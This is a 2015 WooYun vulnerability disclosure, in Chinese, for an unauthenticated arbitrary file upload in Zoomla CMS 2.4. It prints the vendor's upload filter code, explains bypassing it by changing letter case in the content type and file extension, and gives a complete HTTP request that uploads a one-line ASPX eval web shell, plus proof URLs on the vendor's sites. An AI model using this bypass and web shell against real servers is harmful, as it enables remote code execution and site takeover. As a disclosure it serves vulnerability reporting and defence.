当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125982

漏洞标题:逐浪cms 2.4某处任意文件上传(不需要登录)

相关厂商:逐浪CMS

漏洞作者: 1c3z

提交时间:2015-07-10 20:47

修复时间:2015-10-13 09:54

公开时间:2015-10-13 09:54

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向第三方安全合作伙伴开放
2015-09-08: 细节向核心白帽子及相关领域专家公开
2015-09-18: 细节向普通白帽子公开
2015-09-28: 细节向实习白帽子公开
2015-10-13: 细节向公众公开

简要描述:

有防御,但是可以绕过

详细说明:

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤

选区_059.png


asp_code.dll
class ZoomlaSecurityCenter

public static void CheckUpladFiles()
	{
		HttpRequest request = HttpContext.Current.Request;
		HttpResponse response = HttpContext.Current.Response;
		if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1)
		{
			HttpFileCollection files = request.Files;
			for (int i = 0; i < files.Count; i++)
			{
				HttpPostedFile httpPostedFile = files[i];
				string fileName = httpPostedFile.FileName;
				if (httpPostedFile.ContentLength > 0)
				{
					if (fileName.IndexOf(".") > -1)
					{
						string[] array = fileName.Split(new char[]
						{
							'.'
						});
						for (int j = 1; j < array.Length; j++)
						{
							string ext = array[j].ToString().ToLower();
							if (!ZoomlaSecurityCenter.ExNameCheck(ext))
							{
								string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", "");
								string text = SiteConfig.SiteOption.UploadFileExts.ToLower();
								if (!StringHelper.FoundCharInArr(text, findStr, "|"))
								{
									function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件");
									response.End();
								}
							}
							else
							{
								function.WriteErrMsg("请勿上传可疑文件!");
								response.End();
							}
						}
					}
					else
					{
						function.WriteErrMsg("请勿上传可疑文件!");
						response.End();
					}
				}
			}
		}
	}


将multipart/form-data的大小写改下就可以绕过了
局部过滤
可以改文件后缀名大小写绕过

POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1
Host: demo.zoomla.cn
Content-Length: 263
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYsh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//www.zoomla.cn/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1
------WebKitFormBoundaryNyS0P5wwqaOrCYsh
Content-Disposition: form-data; name="Filedata"; filename="name.Aspx"
Content-Type: application/x-aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%>
------WebKitFormBoundaryNyS0P5wwqaOrCYsh--


漏洞证明:

http://www.zoomla.cn/uploadfiles/2015/7/10/201507101729516640188.Aspx?zsd=Response.Write(%22wooyun%22);
http://demo.zoomla.cn/uploadfiles/2015/7/10/201507101729537310808.Aspx?zsd=Response.Write(%22wooyun%22);

修复方案:

!!

版权声明:转载请注明来源 1c3z@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-15 09:52

厂商回复:

感谢反馈!

最新状态:

暂无